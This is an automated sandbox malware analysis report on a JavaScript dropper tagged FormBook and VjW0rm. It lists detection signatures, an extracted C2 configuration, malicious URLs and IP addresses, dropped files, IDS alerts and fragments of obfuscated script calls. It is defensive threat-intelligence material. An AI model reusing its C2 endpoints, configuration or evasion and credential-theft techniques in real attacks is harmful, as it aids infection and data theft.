Windows Analysis Report
CIQ-PO116266.js

Overview

General Information

Sample Name: CIQ-PO116266.js
Analysis ID: 635299
MD5: eb430ba81f36e80bb1a0b27a686ea1a9
SHA1: df9efb1dff452353f5ea481ecf721901107907ba
SHA256: 813f90ecb1ef908f765c987d20937654d2071da8d86ed60352f554786c11afb9
Tags: jsVjw0rm

Detection

FormBook, VjW0rm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected VjW0rm
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Wscript called in batch mode (suppress errors)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Maps a DLL or memory area into another process
Creates multiple autostart registry keys
Uses netsh to modify the Windows network and firewall settings
JavaScript source code contains call to eval containing suspicious API calls
Performs DNS queries to domains with low reputation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Drops script or batch files to the startup folder
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: 00000000.00000003.292250245.0000024969786000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.gafcbooster.com/np8s/"], "decoy": ["segredovideos.online", "kishanshree.com", "mjmvn.com", "44bb44.com", "brawlhallacodestore.com", "littlebeartreeservices.com", "topings33.com", "nachuejooj07.xyz", "waermark.com", "halecamilla.site", "basincreekmedia.com", "resolutionmeasles.com", "interlink-travel.com", "siberup.xyz", "getbusinesscreditandfunding.com", "shcylzc.com", "68chengxinle.com", "jkrsbarmybookarmy.com", "geo-pacificoffshore.com", "refreshertowels.com", "localbloom.online", "brandingaloha.com", "84866.xyz", "salondutaxi.com", "harmlett.com", "angelmatic.net", "o7oiwlp.xyz", "thepowerofanopenquestion.com", "tokenascent.com", "udrivestorage.com", "hengyuejiguang.com", "minotaur.network", "ratebill.com", "18w99.com", "2264a.com", "tentanguang.online", "muddybootslife.com", "vitality-patients.online", "heavymettlelawyers.com", "spxtokensales.com", "titair.com", "lazarusnatura.com", "rasheedabossmoves.com", "medyumgalip.com", "liveafunday.xyz", "xn--wsthof-camping-gsb.com", "xfd8asvtivg944.xyz", "myhvn.site", "964061.com", "screeshot.com", "mysbaally.com", "connectfamily.loan", "langlev.com", "labsreports-menalab.com", "gabefancher.com", "jdhwh2nbiw234.com", "pdwfifi.com", "losangelesrentalz.com", "brandpay.xyz", "jlbwaterdamagerepairseattle.com", "wps-mtb.com", "sekolahkejepang.com", "saastainability.com", "multiverseofbooks.com"]}
Source: CIQ-PO116266.js ReversingLabs: Detection: 14%
Source: Yara match File source: 2.2.bin.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.292250245.0000024969786000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.372823411.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.830373431.0000000000E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401722166.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.830259140.0000000000B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.308018485.0000024969E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.299860714.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300915140.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.801300107.0000000000910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.291613938.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401531356.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401874829.0000000001840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300404894.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.344226970.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.302134868.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.292414870.0000024969A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.295432260.00000249697F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300557956.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.805718233.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: http://www.salondutaxi.com/np8s/ Avira URL Cloud: Label: malware
Source: http://www.littlebeartreeservices.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreZXBsYWNl Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VredmFyIGN0 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrez Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreo_ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre1dG Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreol Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreKTsNClZO Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreok Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrew Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrex Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre-Agent(( Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreOI Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrer Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrenter2Pacv Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreo Avira URL Cloud: Label: malware
Source: www.gafcbooster.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrebWcgPSAi Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrek Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre0n Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrem Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreg Avira URL Cloud: Label: malware
Source: http://www.lazarusnatura.com/np8s/ Avira URL Cloud: Label: malware
Source: http://www.interlink-travel.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreecuritycenterre Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreadkhan.duuo Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre_ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VregpOw Avira URL Cloud: Label: malware
Source: http://www.lazarusnatura.com/np8s/?2dEPbf=4hfxZPP84Ri&U48h=ki1nHMJkMrR7eeT2cjvvxShsxzdLToZEWe0Y/Ruw5T1OY282Gl8t0P/h1biOuIyNKIHU Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrea Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreXGxvY2Fs Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreadkhan.d Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreZigpIHsNrrE4 Avira URL Cloud: Label: malware
Source: http://www.udrivestorage.com/np8s/?U48h=Zh0bV6ZfyWWsx8NH2/NEuPodWNfo5oM06Wd1YTR0VEh7Ou4O0zYflewlPsoSmCQ+q/UO&2dEPbf=4hfxZPP84Ri Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre63209-4053062332-100 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreKS5yZXBsrrO Avira URL Cloud: Label: malware
Source: http://www.brandingaloha.com/np8s/?U48h=N6XRxtM6F1nBVZRwu48YOgJ13F0eVAmeAwT+lah6Tiq2+v96MM9EXT3L0sCJR4qYezv9&m88hS=6ld8i2BhSR2pvHw Avira URL Cloud: Label: malware
Source: http://www.interlink-travel.com/np8s/?U48h=O5u6OlqxnDtTF3riQ4xVZIWxoHxK/fTzbXBC76K0hST926FmxCw4JGrgecy53rLpUaVG&2dEPbf=4hfxZPP84Ri Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre1v Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VredI Avira URL Cloud: Label: malware
Source: http://www.nachuejooj07.xyz/np8s/?U48h=E3oeYQ/4MqgKR0uZQviaDeSIZFjg9uLLieRcSmG+YXW0WXU/K8viVoPbPV+txMCieWz0&m88hS=6ld8i2BhSR2pvHw Avira URL Cloud: Label: phishing
Source: http://www.udrivestorage.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreIFIER=Intel64 Avira URL Cloud: Label: malware
Source: http://www.topings33.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreadkhan.duuE4 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrei4 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreC Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreC:HOMEPATH= Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre-Agent((o Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre; Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreKS5yZXBsrr Avira URL Cloud: Label: malware
Source: http://www.brawlhallacodestore.com/np8s/?U48h=SjFSW0qH8X1Gu/+4r88YNPSLQa2KKx1h4LPt291Cc0nRXdmgbio7b0swgPTE4uOj94VU&m88hS=6ld8i2BhSR2pvHw Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre= Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre8 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre5 Avira URL Cloud: Label: malware
Source: http://www.jlbwaterdamagerepairseattle.com/np8s/?U48h=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo2yEkzAcnCwi&m88hS=6ld8i2BhSR2pvHw Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VretBgsX Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre0 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre088214C05064EeSI Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre- Avira URL Cloud: Label: malware
Source: http://www.xn--wsthof-camping-gsb.com/np8s/?U48h=1Nsioc0lpQImfCEv7q3CJRvbkNIovvFEONaUY8zyneWF7ypKO8GgemnIz8ljrbRyzkwj&m88hS=6ld8i2BhSR2pvHw Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrejIJ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreows Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrePro Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreadkhan.duu Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreVE Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreDQpyZXR1 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrex4 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre02-00600806D9B6 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre~42e Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre-0 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreDQppZiAo Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vres2 Avira URL Cloud: Label: malware
Source: http://www.68chengxinle.com/np8s/ Avira URL Cloud: Label: malware
Source: http://www.topings33.com/np8s/?U48h=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEPodkGcNW4yt&m88hS=6ld8i2BhSR2pvHw Avira URL Cloud: Label: malware
Source: littlebeartreeservices.com Virustotal: Detection: 6%
Source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\bin.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe Metadefender: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\bin.exe Metadefender: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\bin.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bin.exe Joe Sandbox ML: detected
Source: 2.0.bin.exe.13a0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.bin.exe.13a0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: Binary string: netsh.pdb source: bin.exe, 00000002.00000002.402067381.0000000001910000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: bin.exe, 00000002.00000002.402156937.0000000001940000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.296788051.00000000017A4000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.403727008.0000000001A5F000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.293862136.000000000160F000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000003.403509898.0000000003122000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000003.401276125.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000002.894403517.00000000033DF000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000002.841416056.00000000032C0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: netsh.pdbGCTL source: bin.exe, 00000002.00000002.402067381.0000000001910000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: bin.exe, 00000002.00000002.402156937.0000000001940000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.296788051.00000000017A4000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.403727008.0000000001A5F000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.293862136.000000000160F000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000012.00000003.403509898.0000000003122000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000003.401276125.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000002.894403517.00000000033DF000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000002.841416056.00000000032C0000.00000040.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_00921660 FindFirstFileW,FindNextFileW,FindClose, 18_2_00921660
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_00921659 FindFirstFileW,FindNextFileW,FindClose, 18_2_00921659
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Software Vulnerabilities

Source: CIQ-PO116266.js Argument value: ['"gYMty=WSH.CreateObject("adodb.stream")"', '"gYMty=","WSH.CreateObject("adodb.stream")",-386']
Source: CIQ-PO116266.js Argument value: ['"gYMty=WSH.CreateObject("adodb.stream")"', 'gYMty,WSH.CreateObject("adodb.stream")', 'var H3br3w,WSH.CreateObject("microsoft.xmldom").createElement("mko"),H3br3w.dataType,"bin.base64",H3', '"gYMty=","WSH.CreateObject("adodb.stream")",-386', '"gYMty","WSH.CreateObject("adodb.stream")"']
Source: CIQ-PO116266.js Argument value: ['"gYMty=WSH.CreateObject("adodb.stream")"', 'gYMty,WSH.CreateObject("adodb.stream")', 'var H3br3w,WSH.CreateObject("microsoft.xmldom").createElement("mko"),H3br3w.dataType,"bin.base64",H3', '"gYMty=","WSH.CreateObject("adodb.stream")",-386', '"gYMty","WSH.CreateObject("adodb.stream")"']
Source: CIQ-PO116266.js Argument value: ['"gYMty=WSH.CreateObject("adodb.stream")"', '"var H3br3w=WSH.CreateObject("microsoft.xmldom").createElement("mko")"']

Networking

Source: C:\Windows\explorer.exe Network Connect: 104.21.8.218 80
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80
Source: C:\Windows\explorer.exe Network Connect: 15.197.142.173 80
Source: C:\Windows\explorer.exe Network Connect: 81.169.145.161 80
Source: C:\Windows\explorer.exe Domain query: www.topings33.com
Source: C:\Windows\explorer.exe Domain query: www.interlink-travel.com
Source: C:\Windows\explorer.exe Domain query: www.geo-pacificoffshore.com
Source: C:\Windows\explorer.exe Domain query: www.lazarusnatura.com
Source: C:\Windows\explorer.exe Domain query: www.brandingaloha.com
Source: C:\Windows\explorer.exe Domain query: www.salondutaxi.com
Source: C:\Windows\explorer.exe Domain query: www.68chengxinle.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.244 80
Source: C:\Windows\explorer.exe Network Connect: 45.39.111.146 80
Source: C:\Windows\explorer.exe Domain query: www.shcylzc.com
Source: C:\Windows\explorer.exe Domain query: www.xn--wsthof-camping-gsb.com
Source: C:\Windows\explorer.exe Domain query: www.nachuejooj07.xyz
Source: C:\Windows\explorer.exe Network Connect: 170.39.76.27 80
Source: C:\Windows\explorer.exe Network Connect: 154.220.100.142 80
Source: C:\Windows\explorer.exe Domain query: www.medyumgalip.com
Source: C:\Windows\explorer.exe Domain query: www.wps-mtb.com
Source: C:\Windows\System32\wscript.exe Domain query: dilshadkhan.duia.ro
Source: C:\Windows\explorer.exe Domain query: www.littlebeartreeservices.com
Source: C:\Windows\explorer.exe Domain query: www.kishanshree.com
Source: C:\Windows\explorer.exe Network Connect: 162.0.230.89 80
Source: C:\Windows\explorer.exe Network Connect: 52.17.43.61 80
Source: C:\Windows\explorer.exe Domain query: www.jlbwaterdamagerepairseattle.com
Source: C:\Windows\explorer.exe Domain query: www.jdhwh2nbiw234.com
Source: C:\Windows\explorer.exe Network Connect: 132.148.165.111 80
Source: C:\Windows\explorer.exe Domain query: www.sekolahkejepang.com
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 80
Source: C:\Windows\explorer.exe Domain query: www.brawlhallacodestore.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.211 80
Source: C:\Windows\explorer.exe Network Connect: 23.82.37.10 80
Source: C:\Windows\explorer.exe Network Connect: 103.247.11.212 80
Source: C:\Windows\System32\wscript.exe Network Connect: 91.193.75.133 6670
Source: C:\Windows\explorer.exe Domain query: www.gafcbooster.com
Source: C:\Windows\explorer.exe Domain query: www.udrivestorage.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.216 80
Source: C:\Windows\explorer.exe Domain query: www.losangelesrentalz.com
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49796 -> 170.39.76.27:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49796 -> 170.39.76.27:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49796 -> 170.39.76.27:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49807 -> 81.169.145.161:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49807 -> 81.169.145.161:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49807 -> 81.169.145.161:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49822 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49822 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49822 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49869 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49869 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49869 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49881 -> 45.39.111.146:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49881 -> 45.39.111.146:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49881 -> 45.39.111.146:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49920 -> 15.197.142.173:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49920 -> 15.197.142.173:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49920 -> 15.197.142.173:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49946 -> 198.54.117.216:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49946 -> 198.54.117.216:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49946 -> 198.54.117.216:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49955 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49955 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49955 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49960 -> 154.220.100.142:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49960 -> 154.220.100.142:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49960 -> 154.220.100.142:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49969 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49969 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49969 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49972 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49972 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49972 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49978 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49978 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49978 -> 103.247.11.212:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49981 -> 45.39.111.146:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49981 -> 45.39.111.146:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49981 -> 45.39.111.146:80
Source: Traffic Snort IDS: 2829004 ETPRO TROJAN FormBook CnC Checkin (POST) 192.168.2.3:49968 -> 132.148.165.111:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49993 -> 15.197.142.173:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49993 -> 15.197.142.173:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49993 -> 15.197.142.173:80
Source: C:\Windows\explorer.exe DNS query: www.nachuejooj07.xyz
Source: Malware configuration extractor URLs: www.gafcbooster.com/np8s/
Source: Joe Sandbox View ASN Name: PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo2yEkzAcnCwi&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=E3oeYQ/4MqgKR0uZQviaDeSIZFjg9uLLieRcSmG+YXW0WXU/K8viVoPbPV+txMCieWz0&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.nachuejooj07.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=1Nsioc0lpQImfCEv7q3CJRvbkNIovvFEONaUY8zyneWF7ypKO8GgemnIz8ljrbRyzkwj&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.xn--wsthof-camping-gsb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
